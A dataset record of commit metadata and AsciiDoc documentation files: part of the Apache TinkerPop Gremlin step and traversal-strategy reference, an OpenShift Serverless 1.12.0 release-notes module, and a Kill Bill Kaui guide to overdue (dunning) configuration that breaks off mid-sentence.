filtered.\n\n[gremlin-groovy,modern]\n----\ng.E().store().by('weight')\n----\n\n[[subgraph-step]]\nSubgraph Step\n~~~~~~~~~~~~~\n\nimage::subgraph-logo.png[width=380]\n\nExtracting a portion of a graph from a larger one for analysis, visualization or other purposes is a fairly common use case for graph analysts and developers. The `subgraph()`-step (*sideEffect*) provides a way to produce an link:http:\/\/mathworld.wolfram.com\/Edge-InducedSubgraph.html[edge-induced subgraph] from virtually any traversal. The following example demonstrates how to produce the \"knows\" subgraph:\n\n[gremlin-groovy,modern]\n----\nsubGraph = g.E().hasLabel('knows').subgraph('subGraph').cap('subGraph').next() <1>\nsg = subGraph.traversal(standard())\nsg.E() <2>\n----\n\n<1> As this function produces \"edge-induced\" subgraphs, `subgraph()` must be called at edge steps.\n<2> The subgraph contains only \"knows\" edges.\n\nA more common subgraphing use case is to get all of the graph structure surrounding a single vertex:\n\n[gremlin-groovy,modern]\n----\nsubGraph = g.V(3).repeat(__.inE().subgraph('subGraph').outV()).times(3).cap('subGraph').next() <1>\nsg = subGraph.traversal(standard())\nsg.E()\n----\n\n<1> Starting at vertex `3`, traverse 3 steps away on in-edges, outputting all of that into the subgraph.\n\nThere can be multiple `subgraph()` calls within the same traversal. Each operating against either the same graph (i.e. same side-effect key) or different graphs (i.e. different side-effect keys).\n\n[gremlin-groovy,modern]\n----\nt = g.V().outE('knows').subgraph('knowsG').inV().outE('created').subgraph('createdG').\n inV().inE('created').subgraph('createdG').iterate()\nt.sideEffects.get('knowsG').get().traversal(standard()).E()\nt.sideEffects.get('createdG').get().traversal(standard()).E()\n----\n\nIMPORTANT: The `subgraph()`-step only writes to graphs that support user supplied ids for its elements. Moreover, if no graph is specified via `withSideEffect()`, then <<tinkergraph-gremlin,TinkerGraph>> is assumed.\n\n[[sum-step]]\nSum Step\n~~~~~~~~\n\nThe `sum()`-step (*map*) operates on a stream of numbers and sums the numbers together to yield a double. Note that the current traverser number is multiplied by the traverser bulk to determine how many such numbers are being represented.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').sum()\ng.V().repeat(both()).times(3).values('age').sum()\n----\n\nIMPORTANT: `sum(local)` determines the sum of the current, local object (not the objects in the traversal stream). This works for `Collection`-type objects. For any other object, a sum of `Double.NaN` is returned.\n\n[[timelimit-step]]\nTimeLimit Step\n~~~~~~~~~~~~~~\n\nIn many situations, a graph traversal is not about getting an exact answer as its about getting a relative ranking. A classic example is link:http:\/\/en.wikipedia.org\/wiki\/Recommender_system[recommendation]. What is desired is a relative ranking of vertices, not their absolute rank. Next, it may be desirable to have the traversal execute for no more than 2 milliseconds. In such situations, `timeLimit()`-step (*filter*) can be used.\n\nimage::timelimit-step.png[width=400]\n\nNOTE: The method `clock(int runs, Closure code)` is a utility preloaded in the <<gremlin-console,Gremlin Console>> that can be used to time execution of a body of code.\n\n[gremlin-groovy,modern]\n----\ng.V().repeat(both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()\nclock(1) {g.V().repeat(both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()}\ng.V().repeat(timeLimit(2).both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()\nclock(1) {g.V().repeat(timeLimit(2).both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()}\n----\n\nIn essence, the relative order is respected, even through the number of traversers at each vertex is not. The primary benefit being that the calculation is guaranteed to complete at the specified time limit (in milliseconds). Finally, note that the internal clock of `timeLimit()`-step starts when the first traverser enters it. When the time limit is reached, any `next()` evaluation of the step will yield a `NoSuchElementException` and any `hasNext()` evaluation will yield `false`.\n\n[[tree-step]]\nTree Step\n~~~~~~~~~\n\nFrom any one element (i.e. vertex or edge), the emanating paths from that element can be aggregated to form a link:http:\/\/en.wikipedia.org\/wiki\/Tree_(data_structure)[tree]. Gremlin provides `tree()`-step (*sideEffect*) for such this situation.\n\nimage::tree-step.png[width=450]\n\n[gremlin-groovy,modern]\n----\ntree = g.V().out().out().tree().next()\n----\n\nIt is important to see how the paths of all the emanating traversers are united to form the tree.\n\nimage::tree-step2.png[width=500]\n\nThe resultant tree data structure can then be manipulated (see link:http:\/\/www.tinkerpop.com\/javadocs\/current\/org\/apache\/tinkerpop\/gremlin\/process\/graph\/step\/util\/Tree.html[Tree JavaDoc]). For the sake of demonstration, a post-processing lambda is applied in the running example below.\n\n[gremlin-groovy,modern]\n----\ntree = g.V().out().out().tree().by('name').next()\ntree['marko']\ntree['marko']['josh']\ntree.getObjectsAtDepth(3)\n----\n\n[[unfold-step]]\nUnfold Step\n~~~~~~~~~~~\n\nIf the object reaching `unfold()` (*flatMap*) is an iterator, iterable, or map, then it is unrolled into a linear form. If not, then the object is simply emitted. Please see <<fold-step,`fold()`>>-step for the inverse behavior.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out().fold().inject('gremlin',[1.23,2.34])\ng.V(1).out().fold().inject('gremlin',[1.23,2.34]).unfold()\n----\n\nNote that `unfold()` does not recursively unroll iterators. Instead, `repeat()` can be used to for recursive unrolling.\n\n[gremlin-groovy,modern]\n----\ninject(1,[2,3,[4,5,[6]]])\ninject(1,[2,3,[4,5,[6]]]).unfold()\ninject(1,[2,3,[4,5,[6]]]).repeat(unfold()).until(unfold().count().is(1l)).unfold()\n----\n\n[[union-step]]\nUnion Step\n~~~~~~~~~~\n\nimage::union-step.png[width=650]\n\nThe `union()`-step (*branch*) supports the merging of the results of an arbitrary number of traversals. When a traverser reaches a `union()`-step, it is copied to each of its internal steps. The traversers emitted from `union()` are the outputs of the respective internal traversals.\n\n[gremlin-groovy,modern]\n----\ng.V(4).union(\n __.in().values('age'),\n out().values('lang'))\ng.V(4).union(\n __.in().values('age'),\n out().values('lang')).path()\n----\n\n[[valuemap-step]]\nValueMap Step\n~~~~~~~~~~~~~\n\nThe `valueMap()`-step yields a Map representation of the properties of an element.\n\n[gremlin-groovy,modern]\n----\ng.V().valueMap()\ng.V().valueMap('age')\ng.V().valueMap('age','blah')\ng.E().valueMap()\n----\n\nIt is important to note that the map of a vertex maintains a list of values for each key. The map of an edge or vertex-property represents a single property (not a list). The reason is that vertices in TinkerPop3 leverage <<vertex-properties,vertex properties>> which are support multiple values per key. Using the <<the-crew-toy-graph,\"The Crew\">> toy graph, the point is made explicit.\n\n[gremlin-groovy,theCrew]\n----\ng.V().valueMap()\ng.V().has('name','marko').properties('location')\ng.V().has('name','marko').properties('location').valueMap()\n----\n\nIf the `id`, `label`, `key`, and `value` of the `Element` is desired, then a boolean triggers its insertion into the returned map.\n\n[gremlin-groovy,theCrew]\n----\ng.V().hasLabel('person').valueMap(true)\ng.V().hasLabel('person').valueMap(true,'name')\ng.V().hasLabel('person').properties('location').valueMap(true)\n----\n\n[[vertex-steps]]\nVertex Steps\n~~~~~~~~~~~~\n\nimage::vertex-steps.png[width=350]\n\nThe vertex steps (*flatMap*) are fundamental to the Gremlin language. Via these steps, its possible to \"move\" on the graph -- i.e. traverse.\n\n* `out(string...)`: Move to the outgoing adjacent vertices given the edge labels.\n* `in(string...)`: Move to the incoming adjacent vertices given the edge labels.\n* `both(string...)`: Move to both the incoming and outgoing adjacent vertices given the edge labels.\n* `outE(string...)`: Move to the outgoing incident edges given the edge labels.\n* `inE(string...)`: Move to the incoming incident edges given the edge labels.\n* `bothE(string...)`: Move to both the incoming and outgoing incident edges given the edge labels.\n* `outV()`: Move to the outgoing vertex.\n* `inV()`: Move to the incoming vertex.\n* `bothV()`: Move to both vertices.\n* `otherV()` : Move to the vertex that was not the vertex that was moved from.\n\n[gremlin-groovy,modern]\n----\ng.V(4)\ng.V(4).outE() <1>\ng.V(4).inE('knows') <2>\ng.V(4).inE('created') <3>\ng.V(4).bothE('knows','created','blah')\ng.V(4).bothE('knows','created','blah').otherV()\ng.V(4).both('knows','created','blah')\ng.V(4).outE().inV() <4>\ng.V(4).out() <5>\ng.V(4).inE().outV()\ng.V(4).inE().bothV()\n----\n\n<1> All outgoing edges.\n<2> All incoming knows-edges.\n<3> All incoming created-edges.\n<4> Moving forward touching edges and vertices.\n<5> Moving forward only touching vertices.\n\n[[where-step]]\nWhere Step\n~~~~~~~~~~\n\nThe `where()`-step filters the current object based on either the object itself (`Scope.local`) or the path history of the object (`Scope.global`) (*filter*). This step is typically used in conjuction with either <<match-step,`match()`>>-step or <<select-step,`select()`>>-step, but can be used in isolation.\n\n[gremlin-groovy,modern]\n----\ng.V(1).as('a').out('created').in('created').where(neq('a')) <1>\ng.withSideEffect('a'){['josh','peter']}.V(1).out('created').in('created').values('name').where(within('a')) <2>\ng.V(1).out('created').in('created').where(out('created').count().is(gt(1))).values('name') <3>\n----\n\n<1> Who are marko's collaborators, where marko can not be his own collaborator? (predicate)\n<2> Of the co-creators of marko, only keep those whose name is josh or peter. (using a sideEffect)\n<3> Which of marko's collaborators have worked on more than 1 project? (using a traversal)\n\nIMPORTANT: Please see <<using-where-with-match,`match().where()`>> and <<using-where-with-select,`select().where()`>> for how `where()` can be used in conjunction with `Map<String,Object>` projecting steps -- i.e. `Scope.local`.\n\n[[a-note-on-barrier-steps]]\nA Note on Barrier Steps\n-----------------------\n\nimage:barrier.png[width=165,float=right] Gremlin is primarily a link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazy], stream processing language. This means that Gremlin fully processes (to the best of its abilities) any traversers currently in the traversal pipeline before getting more data from the start\/head of the traversal. However, there are numerous situations in which a completely lazy computation is not possible (or impractical). When a computation is not lazy, a \"barrier step\" exists. There are three types of barriers:\n\n . `CollectingBarrierStep`: All of the traversers prior to the step are put into a collection and then processed in some way (e.g. ordered) prior to the collection being \"drained\" one-by-one to the next step. Examples include: <<order-step,`order()`>>, <<sample-step,`sample()`>>, <<aggregate-step,`aggregate()`>>.\n . `ReducingBarrierStep`: All of the traversers prior to the step are processed by a reduce function and once all the previous traversers are processed, a single \"reduced value\" traverser is emitted to the next step. Examples include: <<fold-step,`fold()`>>, <<count-step,`count()`>>, <<sum-step,`sum()`>>, <<max-step,`max()`>>, <<min-step,`min()`>>.\n . `SupplyingBarrierStep`: All of the traversers prior to the step are iterated (no processing) and then some provided supplier yields a single traverser to continue to the next step. Examples include: <<cap-step,`cap()`>>.\n\nIn Gremlin OLAP (see <<traversalvertexprogram,`TraversalVertexProgram`>>), a barrier is introduced at the end of every <<vertex-steps,adjacent vertex step>>. This means that the traversal does its best to compute as much as possible at the current, local vertex. What is can't compute without referencing an adjacent vertex is aggregated into a barrier collection. When there are no more traversers at the local vertex, the barriered traversers are the messages that are propagated to remote vertices for further processing.\n\n[[a-note-on-lambdas]]\nA Note On Lambdas\n-----------------\n\nimage:lambda.png[width=150,float=right] A link:http:\/\/en.wikipedia.org\/wiki\/Anonymous_function[lambda] is a function that can be referenced by software and thus, passed around like any other piece of data. In Gremlin, lambdas make it possible to generalize the behavior of a step such that custom steps can be created (on-the-fly) by the user. However, it is advised to avoid using lambdas if possible.\n\n[gremlin-groovy,modern]\n----\ng.V().filter{it.get().value('name') == 'marko'}.\n flatMap{it.get().vertices(OUT,'created')}.\n map {it.get().value('name')} <1>\ng.V().has('name','marko').out('created').values('name') <2>\n----\n\n<1> A lambda-rich Gremlin traversal which should and can be avoided. (*bad*)\n<2> The same traversal (result), but without using lambdas. (*good*)\n\nGremlin attempts to provide the user a comprehensive collection of steps in the hopes that the user will never need to leverage a lambda in practice. It is advised that users only leverage a lambda if and only if there is no corresponding lambda-less step that encompasses the desired functionality. The reason being, lambdas can not be optimized by Gremlin's compiler strategies as they can not be programmatically inspected (see <<traversalstrategy,traversal strategies>>).\n\nIn many situations where a lambda could be used, either a corresponding step exists or a traversal can be provided in its place. A `TraversalLambda` behaves like a typical lambda, but it can be optimized and it yields less objects than the corresponding pure-lambda form.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by {it.value('name')}.\n by {it.value('name')}.\n by {g.V(it).in('created').values('name').fold().next()} <1>\ng.V().out().out().path().by('name').\n by('name').\n by(__.in('created').values('name').fold()) <2>\n----\n\n<1> The length-3 paths have each of their objects transformed by a lambda. (*bad*)\n<2> The length-3 paths have their objects transformed by a lambda-less step and a traversal lambda. (*good*)\n\n[[traversalstrategy]]\nTraversalStrategy\n-----------------\n\nimage:traversal-strategy.png[width=125,float=right] A `TraversalStrategy` can analyze a `Traversal` and mutate the traversal as it deems fit. This is useful in multiple situations:\n\n * There is an application-level feature that can be embedded into the traversal logic (*decoration*).\n * There is a more efficient way to express the traversal at the TinkerPop3 or graph vendor level (*optimization*).\n * There are are some final adjustments required before executing the traversal (*finalization*).\n * There are certain traversals that are not legal for the application or traversal engine (*verification*).\n\nA simple `OptimizationStrategy` is the `IdentityRemovalStrategy`.\n\n[source,java]\n----\npublic class IdentityRemovalStrategy extends AbstractTraversalStrategy<TraversalStrategy.OptimizationStrategy> implements TraversalStrategy.OptimizationStrategy {\n\n private static final IdentityRemovalStrategy INSTANCE = new IdentityRemovalStrategy();\n\n private IdentityRemovalStrategy() {\n }\n\n @Override\n public void apply(final Traversal.Admin<?, ?> traversal) {\n if (!TraversalHelper.hasStepOfClass(IdentityStep.class, traversal))\n return;\n TraversalHelper.getStepsOfClass(IdentityStep.class, traversal).stream()\n .filter(step -> !TraversalHelper.isLabeled(step))\n .forEach(step -> traversal.removeStep(step));\n }\n\n public static IdentityRemovalStrategy instance() {\n return INSTANCE;\n }\n}\n----\n\nThis strategy simply removes any unlabeled `IdentityStep` steps in the Traversal as `aStep().identity().identity().bStep()` is equivalent to `aStep().bStep()`. For those traversal strategies that require other strategies to execute prior or post to the strategy, then the following two methods can be defined in `TraversalStrategy` (with defaults being an empty set). If the `TraversalStrategy` is in a particular traversal category (i.e. decoration, optimization, finalization, or verification), then priors and posts are only possible within the category.\n\n[source,java]\npublic Set<Class<? extends S>> applyPrior();\npublic Set<Class<? extends S>> applyPost();\n\nIMPORTANT: `TraversalStrategy` categories are sorted within their category and the categories are then executed in the following order: decoration, optimization, finalization, and verification. If a designed strategy does not fit cleanly into these categories, then it can implement `TraversalStrategy` and its prior and posts can reference strategies within any category.\n\nAnother example `OptimizationStrategy` in action is provided below.\n\n[source,groovy]\ng.V().has('name','marko')\n\nThe expression above can be executed in a `O(|V|)` or `O(log(|V|)` fashion in <<tinkergraph-gremlin,TinkerGraph>> depending on whether there is or is not an index defined for \"name.\"\n\n[source,java]\n----\npublic final class TinkerGraphStepStrategy extends AbstractTraversalStrategy<TraversalStrategy.OptimizationStrategy> implements TraversalStrategy.OptimizationStrategy {\n\n private static final TinkerGraphStepStrategy INSTANCE = new TinkerGraphStepStrategy();\n private static final Set<Class<? extends OptimizationStrategy>> PRIORS = new HashSet<>();\n\n static {\n PRIORS.add(IdentityRemovalStrategy.class);\n }\n\n private TinkerGraphStepStrategy() {\n }\n\n @Override\n public void apply(final Traversal.Admin<?, ?> traversal) {\n if (traversal.getEngine().isComputer())\n return;\n\n final Step<?, ?> startStep = traversal.getStartStep();\n if (startStep instanceof GraphStep) {\n final GraphStep<?> originalGraphStep = (GraphStep) startStep;\n final TinkerGraphStep<?> tinkerGraphStep = new TinkerGraphStep<>(originalGraphStep);\n TraversalHelper.replaceStep(startStep, (Step) tinkerGraphStep, traversal);\n\n Step<?, ?> currentStep = tinkerGraphStep.getNextStep();\n while (true) {\n if (currentStep instanceof HasContainerHolder) {\n tinkerGraphStep.hasContainers.addAll(((HasContainerHolder) currentStep).getHasContainers());\n currentStep.getLabels().forEach(tinkerGraphStep::addLabel);\n traversal.removeStep(currentStep);\n } else {\n break;\n }\n currentStep = currentStep.getNextStep();\n }\n }\n }\n\n @Override\n public Set<Class<? extends OptimizationStrategy>> applyPrior() {\n return PRIORS;\n }\n\n public static TinkerGraphStepStrategy instance() {\n return INSTANCE;\n }\n}\n----\n\nThe traversal is redefined by simply taking a chain of `has()`-steps after `g.V()` (`TinkerGraphStep`) and providing them to `TinkerGraphStep`. Then its up to TinkerGraphStep to determine if an appropriate index exists. In the code below, review the `vertices()` method and note how if an index exists, for a particular `HasContainer`, then that index is first queried before the remaining `HasContainer` filters are serially applied.\n\n[gremlin-groovy,modern]\n----\nt = g.V().has('name','marko'); null\nt.toString()\nt.iterate(); null\nt.toString()\n----\n\nA collection of useful `DecorationStrategy` strategies are provided with TinkerPop3 and are generally useful to end-users. The following sub-sections detail these strategies:\n\nElementIdStrategy\n~~~~~~~~~~~~~~~~~\n\n`ElementIdStrategy` provides control over element identifiers. Some Graph implementations, such as TinkerGraph, allow specification of custom identifiers when creating elements:\n\n[gremlin-groovy]\n----\ng = TinkerGraph.open().traversal()\nv = g.addV(id,'42a')\ng.V('42a')\n----\n\nOther `Graph` implementations, such as Neo4j, generate element identifiers automatically and cannot be assigned. As a helper, `ElementIdStrategy` can be used to make identifier assignment possible by using vertex and edge indicies under the hood.\n\n[source,groovy]\n----\ngremlin> graph = Neo4jGraph.open('\/tmp\/neo4j')\n==>neo4jgraph[EmbeddedGraphDatabase [\/tmp\/neo4j]]\ngremlin> strategy = ElementIdStrategy.build().create()\n==>ElementIdStrategy\ngremlin> g = GraphTraversalSource.build().with(strategy).create(graph)\n==>graphtraversalsource[neo4jgraph[EmbeddedGraphDatabase [\/tmp\/neo4j]], standard]\ngremlin> g.addV(id, '42a').id()\n==>42a\n----\n\nIMPORTANT: The key that is used to store the assigned identifier should be indexed in the underlying graph database. If it is not indexed, then lookups for the elements that use these identifiers will perform a linear scan.\n\nEventStrategy\n~~~~~~~~~~~~~\n\nThe purpose of the `EventStrategy` is to raise events to one or more `MutationListener` objects as changes to the underlying `Graph` occur within a `Traversal`. Such a strategy is useful for logging changes, triggering certain actions based on change, or any application that needs notification of some mutating operation during a `Traversal`. Graphs that do not support transactions will generate events immediately upon mutation, while those graphs that support transactions will queue the mutations until that transaction is committed and will then raise the events. If the transaction is rolled back, the event queue is reset.\n\nThe following events are raised to the `MutationListener`:\n\n* New vertex\n* New edge\n* Vertex property changed\n* Edge property changed\n* Vertex property removed\n* Edge property removed\n* Vertex removed\n* Edge removed\n\nTo start processing events from a `Traversal` first implement the `MutationListener` interface. An example of this implementation is the `ConsoleMutationListener` which writes output to the console for each event. The following console session displays the basic usage:\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nl = new ConsoleMutationListener(graph)\nstrategy = EventStrategy.build().addListener(l).create()\ng = GraphTraversalSource.build().with(strategy).create(graph)\ng.addV('name','stephen')\ng.E().drop()\n----\n\nThe example above uses TinkerGraph which does not support transactions. As mentioned previously, for these types of graph implementations events are raised as they occur within execution of a `Step`. As such, the final line of Gremlin execution that drops all edges shows a bit of an inconsistent count, where the removed edge count is accounted for after the event is raised.\n\nCAUTION: `EventStrategy` is not meant for usage in tracking global mutations across separate processes. In other words, an mutation in what JVM process is not raised as an event in a different JVM process. In addition, events are not raised when mutations occur outside of the `Traversal` context.\n\nPartitionStrategy\n~~~~~~~~~~~~~~~~~\n\nimage::partition-graph.png[width=325]\n\n`PartitionStrategy` partitions the vertices and edges of a graph into `String` named partitions (i.e. buckets, subgraphs, etc.). The idea behind `PartitionStrategy` is presented in the image above where each element is in a single partition (represented by its color). Partitions can be read from, written to, and linked\/joined by edges that span one or two partitions (e.g. a tail vertex in one partition and a head vertex in another).\n\nThere are three primary variables in `PartitionStrategy`:\n\n. Partition Key - The property key that denotes a String value representing a partition.\n. Write Partition - A `String` denoting what partition all future written elements will be in.\n. Read Partitions - A `Set<String>` of partitions that can be read from.\n\nThe best way to understand `PartitionStrategy` is via example.\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nstrategyA = PartitionStrategy.build().partitionKey(\"_partition\").writePartition(\"a\").addReadPartition(\"a\").create()\nstrategyB = PartitionStrategy.build().partitionKey(\"_partition\").writePartition(\"b\").addReadPartition(\"b\").create()\ngA = GraphTraversalSource.build().with(strategyA).create(graph)\ngA.addV() \/\/ this vertex has a property of {_partition:\"a\"}\ngB = GraphTraversalSource.build().with(strategyB).create(graph)\ngB.addV() \/\/ this vertex has a property of {_partition:\"b\"}\ngA.V()\ngB.V()\n----\n\nBy writing elements to particular partitions and then restricting read partitions, the developer is able to create multiple graphs within a single address space. Moreover, by supporting references between partitions, it is possible to merge those multiple graphs (i.e. join partitions).\n\nReadOnlyStrategy\n~~~~~~~~~~~~~~~~\n\n`ReadOnlyStrategy` is largely self-explanatory. A `Traversal` that has this strategy applied will throw an `IllegalStateException` if the `Traversal` has any mutating steps within it.\n\nSubgraphStrategy\n~~~~~~~~~~~~~~~~\n\n`SubgraphStrategy` is quite similar to `PartitionStrategy` in that it restrains a `Traversal` to certain vertices and edges as determined by a `Predicate` defined individually for each.\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nvertexCriterion = { vertex -> true }\nedgeCriterion = { edge -> edge.id() >= 8 && edge.id() <= 10}\nstrategy = SubgraphStrategy.build().vertexPredicate(vertexCriterion).edgePredicate(edgeCriterion).create()\ng = GraphTraversalSource.build().with(strategy).create(graph)\ng.V() \/\/ shows all vertices as they all pass the vertexCriterion\ng.E() \/\/ shows only the edges defined in the edgeCriterion\n----\n\nNote that `SubgraphStrategy` directly passes the edge and vertex criterion `Predicate` objects to an injected `filter` step and as such may not take advantage of important optimizations provided by the various `Graph` implementations (given the use of lambda expressions).\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f1aad94ff51f1dc8ab14bd17964a5369a3fad75a","subject":"added QE feedback","message":"added QE feedback\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/serverless-rn-1-12-0.adoc","new_file":"modules\/serverless-rn-1-12-0.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * serverless\/release-notes.adoc\n\n[id=\"serverless-rn-1-12-0_{context}\"]\n\n= Release Notes for Red Hat {ServerlessProductName} 1.12.0\n\n[id=\"new-features-1-12-0_{context}\"]\n== New features\n\n* {ServerlessProductName} now uses Knative Serving 0.18.2.\n* {ServerlessProductName} uses Knative Eventing 0.18.6.\n* {ServerlessProductName} now uses Kourier 0.18.0.\n* {ServerlessProductName} now uses Knative `kn` CLI 0.18.4.\n* {ServerlessProductName} now uses Knative Kafka 0.18.0.\n\n[id=\"fixed-issues-1-12-0_{context}\"]\n== Fixed issues\n\n* In previous versions, if you used a ping source with OpenShift Serverless, after you uninstalled and deleted all other Knative Eventing components, the `pingsource-jobrunner` deployment was not deleted. This issue is now fixed, and the `pingsource-jobrunner` deployment has been renamed to `pingsource-mt-adapter`.\n* In previous versions, deleting a sink before you delete the `SinkBinding` resource connected to it caused the resource deletion to hang. This issue is now fixed.\n\n[id=\"known-issues-1-12-0_{context}\"]\n== Known issues\n\n* Using the `eventing.knative.dev\/scope: namespace` annotation for the `KafkaChannel` objects is not supported.\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * serverless\/release-notes.adoc\n\n[id=\"serverless-rn-1-12-0_{context}\"]\n\n= Release Notes for Red Hat {ServerlessProductName} 1.12.0\n\n[id=\"new-features-1-12-0_{context}\"]\n== New features\n\n* {ServerlessProductName} now uses Knative Serving 0.18.2.\n* {ServerlessProductName} uses Knative Eventing 0.18.6.\n* {ServerlessProductName} now uses Kourier 0.18.0.\n* {ServerlessProductName} now uses Knative `kn` CLI 0.18.4.\n* {ServerlessProductName} now uses Knative Kafka 0.18.0.\n\n[id=\"fixed-issues-1-12-0_{context}\"]\n== Fixed issues\n\n[id=\"known-issues-1-12-0_{context}\"]\n== Known issues\n\n* Using the `eventing.knative.dev\/scope: namespace` annotation for the `KafkaChannel` objects is not supported.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9efece941db53133438f1669da61b37eef2cfb8d","subject":"clarify Tag Inclusions\/Exclusion","message":"clarify Tag Inclusions\/Exclusion\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/includes\/overdue.adoc","new_file":"userguide\/kaui\/includes\/overdue.adoc","new_contents":":icons: font\n:imagesdir: C:\\_My Documents\\FlowWritingLLC\\Projects\\Kill Bill\\Documentation\\killbill-docs\\userguide\\assets\\img\\kaui\n\n=== Overview\n\nKaui lets you configure basic settings for how the system behaves when an account is overdue. For overdue configuration, you define:\n\n* The various states that the account must go through\n* The change in users' entitlements when the account is transitioned from one state to the other\n* The period after which the state is re-evaluated\n\nThese three pieces of information make up the _overdue flow_.\n\nOverdue configuration applies at the tenant level. However you can also configure overdue flows for the _global_ Kill Bill system.\n\nIn Kaui, overdue configuration is a subset of the full overdue configuration settings. For more information on the full configuration settings and global settings, see the https:\/\/docs.killbill.io\/latest\/overdue.html[_Overdue System Guide_].\n\nSee the following sections to create overdue (dunning) flows for a tenant:\n\n[cols=\"1,1\"]\n[frame=none]\n[grid=none]\n|===\n\na| * <<View Overdue Configuration,View overdue configuration>>\n* <<Create Overdue Flows,Create overdue flows>>\n* <<Upload an XML Overdue Configuration File,Upload an XML overdue configuration file>>\n\na| * <<View Overdue Configuration as XML,View overdue configuration as XML>>\n* <<Delete Overdue Flows,Delete overdue flows>>\n\n|===\n\n==== Additional Overdue Resources\n\n* https:\/\/docs.killbill.io\/latest\/userguide_subscription.html#components-overdue[\"Overdue\"] section in the _Subscription Guide_.\n* https:\/\/docs.killbill.io\/latest\/overdue.html[_Overdue System Guide_]\n\n=== View Overdue Configuration\n\nIf any overdue (dunning) flows are configured, you can see them on the Overdue Show tab at the bottom of the Tenant Configuration page. To get there:\n\n. Click on your username and tenant name in the upper right corner:\n+\nimage::Users-SelectTenantName.png[width=650,align=\"center\"]\n+\nKaui displays the Tenant Configuration page.\n+\n. Scroll down and click on the Overdue Show tab:\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n\n=== Create Overdue Flows\n\nThe following steps explain how to set up overdue flows (i.e., actions) for the tenant.\n\n. <<View Overdue Configuration,Go to the Overdue Show tab>> on the Tenant Configuration page.\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n+\n. Click the plus sign ( image:i_PlusGreen.png[] ) next to *Existing Overdue Config*.\n+\nKaui opens the Overdue Configuration screen:\n+\nimage::OverdueConfig-Empty.png[width=850,align=\"center\"]\n+\n. Click *+ New Overdue States*. Kaui opens the fields for editing:\n+\nimage::OverdueConfig-BlankFields.png[width=850,align=\"center\"]\n+\n. Fill in the fields for the current row. For field information, see the <<Overdue Configuration Field Descriptions>> table.\n+\n. To add another overdue configuration row, click *+ new overdue states*.\n+\nimage::Overdue-Select-NewOverdueState.png[width=450,align=\"center\"]\n+\n. When you are done adding configuration rows, click the *Save* button. Kaui displays a success message at the top of the screen and displays the new overdue flow(s) on the Overdue Show tab.\n+\nimage::Overdue-ShowFlows.png[width=850,align=\"center\"]\n\n[NOTE]\n*Note:* To edit an existing overdue flow, on the Overdue Show tab, click the plus sign ( image:i_PlusGreen.png[] ) next to *Existing Overdue Config*. This opens the overdue configuration fields in edit mode.\n\n=== Overdue Configuration Field Descriptions\n\n[cols=\"1,3\"]\n|===\n^|Field ^|Description\n\n| Name\n| The name assigned to the overdue state.\n\n| External Message\n| Message text that other plugins, when listening for overdue events, can retrieve and display to the user. (_Optional_)\n\n| Block Subscription Changes\n| If set to `true`, the customer _cannot_ make plan changes to the subscription in this overdue flow. If set to `false`, the customer is allowed to make changes.\n\n| Subscription Cancellation\na| Select the option that describes how Kill Bill behaves regarding a cancellation in this overdue flow:\n\n* `NONE`: Kill Bill ignores this field, and the subscription is not cancelled.\n\n* `POLICY_NONE`: ??? _Maybe some to do with the default cancellation policy in the catalog? Not sure..._\n\n* `POLICY_IMMEDIATE_POLICY`: Cancels the subscription immediately and applies a partial credit to the\naccount based on how much of the service has been consumed.\n\n* `POLICY_END_OF_TERM`: Cancels the subscription at the end of the billing period with no refund to\nthe customer (i.e., no proration).\n\n| Days Since Earliest Unpaid Invoice\n| Specifies how many days should pass after the last unpaid invoice before initiating this overdue flow.\n\n| Tag Inclusion\na| Specifies that the overdue flow will occur if the account has a system (control) tag matching the one selected here. To disregard tag inclusion for this overdue flow, leave as the default `NONE` setting.\n\n* `AUTO_PAY_OFF`\n* `AUTO_INVOICING_OFF`\n* `OVERDUE_ENFORCEMENT_OFF`\n* `MANUAL_PAY`\n* `TEST`\n* `PARTNER`\n\nFor a description of system tags, see the https:\/\/docs.killbill.io\/latest\/userguide_subscription.html#components-tag[\"Tags\"] section of the _Subscription Guide_.\n\n| Tag Exclusion\n| Specifies that overdue flow will occur if the account has NO system (control) tags matching the one selected here. To disregard tag exclusion for this overdue flow, leave as the default `NONE` setting.\n\n| Number of Unpaid Invoices\n| Specifies that the overdue flow will occur if the number of unpaid invoices equals or exceeds the specified value.\n\n| Total Unpaid Invoice Balance\n| Specifies that the overdue action will occur if the total unpaid invoice balance equals or exceeds the specified value.\n\n|===\n\n=== Upload an XML Overdue Configuration File\n\nKill Bill overdue configuration is stored in XML format. This section explains how to upload an XML file that contains the overdue configuration.\n\n[NOTE]\n*Note*: You cannot edit a raw overdue configuration XML file in Kaui.\n\n. <<View Overdue Configuration,Go to the Overdue Show tab>> on the Tenant Configuration page.\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n+\n. Click the plus sign ( image:i_PlusGreen.png[] ) next to *Existing Overdue Config*.\n+\nKaui opens the Overdue Configuration screen:\n+\nimage::OverdueConfig-Empty.png[width=850,align=\"center\"]\n+\n. Click *Enable Advanced Configuration (Upload XML)*. Kaui displays an upload screen:\n+\nimage::Overdue-AdvancedConfigUpload.png[width=450,align=\"center\"]\n+\n. Click the *Choose File* button, locate the XML file, and select it.\n+\nOnce you have selected the file, Kaui displays the filename next to the *Choose File* 